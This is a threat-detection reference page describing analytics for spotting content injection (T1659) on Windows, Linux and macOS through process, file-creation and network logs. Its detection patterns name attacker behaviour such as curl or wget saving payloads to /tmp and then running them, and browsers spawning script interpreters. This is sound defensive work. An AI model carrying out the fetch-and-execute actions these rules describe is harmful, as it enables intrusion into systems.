1. Home
  2. Detection Strategies
  3. Detection Strategy for Content Injection

Detection Strategy for Content Injection

Technique Detected:  Content Injection | T1659

ID: DET0349
Domains: Enterprise
Analytics: AN0992, AN0993, AN0994
Version: 1.0
Created: 21 October 2025
Last Modified: 21 October 2025
Version Permalink

Analytics

AN0992

Detect suspicious file creations and process executions triggered by browser activity (e.g., injected payloads written to %AppData% or Temp directories, then executed). Correlate network anomalies with subsequent local process creation or script execution.

Log Sources
Data Component Name Channel
Process Creation (DC0032) WinEventLog:Security EventCode=4688
File Creation (DC0039) WinEventLog:Sysmon EventCode=11
Network Traffic Content (DC0085) NSM:Flow Unexpected script or binary content returned in HTTP response body
Mutable Elements
Field Description
MonitoredExtensions File extensions to flag (exe, dll, js, vbs, sh, etc.).
SuspiciousParentProcesses Browser processes (chrome.exe, firefox.exe, edge.exe, etc.) monitored as possible parents for malicious activity.
RedirectList List of suspicious domains or URLs used for malicious redirects.

AN0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

Log Sources
Data Component Name Channel
Command Execution (DC0064) auditd:SYSCALL execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution
File Creation (DC0039) WinEventLog:Sysmon File creation of suspicious scripts/binaries in temporary directories
Network Traffic Content (DC0085) NSM:Flow Injected content responses with unexpected script/malware signatures
Mutable Elements
Field Description
TempDirectories Directories such as /tmp and /var/tmp where injected files are often written.

AN0994

Monitor unified logs for processes spawned from Safari or other browsers that immediately load scripts or executables. Detect file drops in ~/Library/Caches or ~/Downloads that execute shortly after being written.

Log Sources
Data Component Name Channel
Process Creation (DC0032) macos:unifiedlog Child processes of Safari, Chrome, or Firefox executing scripting interpreters
File Creation (DC0039) macos:unifiedlog File creation of unsigned binaries/scripts in user cache or download directories
Network Traffic Content (DC0085) NSM:Flow Content injection observed in HTTPS responses with mismatched certificates or altered payloads
Mutable Elements
Field Description
MonitoredDirectories macOS-specific directories where malicious payloads may be written.